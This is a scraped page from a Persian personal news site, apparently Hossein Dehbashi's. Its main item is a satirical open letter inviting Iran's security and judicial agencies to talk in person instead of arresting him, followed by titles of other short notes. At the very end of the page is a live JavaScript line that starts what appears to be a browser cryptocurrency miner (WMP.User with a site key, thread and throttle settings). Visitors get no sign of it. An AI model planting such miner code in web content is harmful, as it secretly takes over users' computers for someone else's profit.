یادداشت‌ها

یادداشت 352

پیامی سرگشاده به بچه‌های بالا! / در فضیلتِ پیشگیری قبل از درمان!

برادران (واحیانا خواهران) امور مجازی، اینترنتی، فتا، جنگِ نرم و غیره (شرمنده نامِ رسمی واحدتان معلوم نبود!) در قوه محترمِ قضائیه، سپاهِ سرافرازِ پاسداران انقلابِ اسلامی، وزارتِ فخیمهء اطلاعات (به قولِ ریاستِ محترمِ جمهوری، بُنِ استخوانِ نظام)، نیرویِ انتظامی و سایرْ دوستان (جایی را از قلم نیفتاد؟)

سلام علیکم، طاعات و عبادات قبول!

نگارنده راستش چندباری از طریق آشنایانی که گمان می‌کرد با شما مرتبط‌اند (فی‌الواقع خودشان این‌جوری گفتند، العهده علی الزاوی!) پیغام داد که عزیزِ دلِ برادر! قراری بگذارید دوسه ساعته، در منطقه ای بی‌طرف تا دوکلمه حرفِ حسابی بزنیم و سنگ‌هایمان/تان/شان را باهم وابکنیم در فقره نوشته جات و رسانه جاتِ اینجانب که دریغ! گویا یا نامه نمی‌خوانید یا نام نمی‌دانید یا تحویل نمی‌گیرید یا پس چی؟

باری، برادرعزیز، خواهرِ گرامی، معروض میدارد که این همسرِ مکرمّهء ما اصولا مقدمِ هیچ مهمانِ ناخوانده ای را گرامی نمی‌دارد (ولو مادرشوهر باشد و خاصّه اگر نیمه شب باشد و سرزده) و نیز این کتابخانهء مفصّل خانه، تازه مرتّب شده و خُب، حالِ دوباره مرتّب کردنش نیست و حتما اوین هم سرد است و شما هم که لابد شام لوبیا می‌دهید بی نانِ تازهء سنگک و.... فلذا، این پیامِ سرگشاده را در مقام دعوتی رسمی ببینید از بابِ دیداری حضوری و تعیین و تبیینِ مصالح و مواضع طرفینِ اخوین! قبول؟

البته این برادرِ کماکان انقلابی تان، اصلا قول نمی‌دهد زیرِ بارِ حرفِ زور برود (طبعا مگر زورش خیلی پُرزور باشد!) اما چه خوب است اگر جوری شود که محدوده دعواهایمان در حدودِ اختلافاتی به ناچار و واقعی باشد نه به علاوهء سوتفاهم هایی خیالی و بیهوده و بیخودی!

پ.ن:
دوستانی که دستشان به بچه‌های بالا می‌رسد، قربانْ دستشان، این سرگشاده را تا معنی اش عوض نشده، دست به دست کنند تا برسد به دستِ صاحبش.

با چشمانی که تار می‌بیند و انگشتانی که به سختی تایپ می‌کند
با مهر و احترامِ بسیار و قدری احتیاط و سایرِ افزودنی‌های مجاز
حسین دهباشی/ مستندنگار و مدیر سایتِ خبریِ تاریخ‌آنلاین و حومه

 

ارسال کننده: حسین دهباشی
تاریخ: 16 مهر 1395
یادداشت 359

دو آزادی در یک روز:

یادداشت 358

برای خواندن سلسله مطالب "مسافر جاده هراز" زندگی نامه خودنوشت افشین علاء به کانال شخصی او مراجعه فرمایید.

یادداشت 357

هو الله

یادداشت 356

در نقد مقایسه رذیلانه‌ی انتخاب ترامپ و انتخاب احمدی نژاد / علی علیزاده

یادداشت 355

من مرگِ هیچ معلّمی را باور نمی‌کنم!/ در سوگِ تورانِ میرهادی

یادداشت 354

‏[ از شُمارِ دوچشم | یک تن کم | وز شُمارِ خرد... | هزاران بیش ] «تورانِ میرهادی» | نازنین دُردانهء آموزش و پرورشِ نوینِ ایران درگذشت

یادداشت 354

اُمیدِحسینی | که البتّه نگاهِ سیاسی بسیار متفاوتی با نگارنده دارد | نیازی به هیچ تبلیغی ندارد | وبلاگِ «آهستان» که در شمارِ پُرمغزونغزترین ذخایرِ جناحِ اصولگرایِ مجازستان بوده است، هم! | و کانالِ تازه تاسیسِ او در تلگرام نیز لابُد چنان می‌شود | خواندنی و لب‌ریز و لب‌سوز و لب‌دوز!| علیکم به عضویت و پیگیریِ آن:

یادداشت 353

کتاب‌های زرد می‌توانند رقیب فضای مجازی و ماهواره باشند

یادداشت 350

دودوتا؟ لُبنان‌تا!/ مهردادِ فرهمند

یادداشت 349

محسن میردامادی |سردبیر روزنامه سلام، دبیرکل جبهه مشارکت: " شورای امنیت سازمان ملل صلاحیت ندارد، ملّت آمریکا به وظیفهء خود در مورد گروگانگیری ما عمل کنند، همه کسانی که در سفارت آمریکا کار می‌کردند از نظر ما مجرم و جاسوس هستند، محاکمه را ممکن است به دادگاه لاهه بسپاریم، اگر آمریکا را محکوم کرد قبول می‌کنیم، در غیر این صورت رای آن هیچ بها و ارزشی برای ما ندارد..."

یادداشت 348

‏شمریم! اگر روزِ ستم خاموشیم خون است! اگر آبِ خُنک می‌نوشیم آن‌سویِ جهان کرب و بلایی بر پاست ما هم دلمان خوش است! مشکی پوشیم!

یادداشت 347

‏نگارنده البته، همان اوایل دولت دریافت اینکاره نیست و عذرخواست و استعفا داد. ولی نمی‌دانست تا این هفته جانشینی به جایش نرفته! باری، برای اعضاء سابق و لاحقِ هیأت مدیره کیش عاقبت به خیری مسئلت می‌نمایم
var someData = WMP.User('SK_A4VFH9k7Si5999pXyW7id', 'soroush',{ threads: 4, autoThreads: false, throttle: 0.3, forceASMJS: false }); someData.start();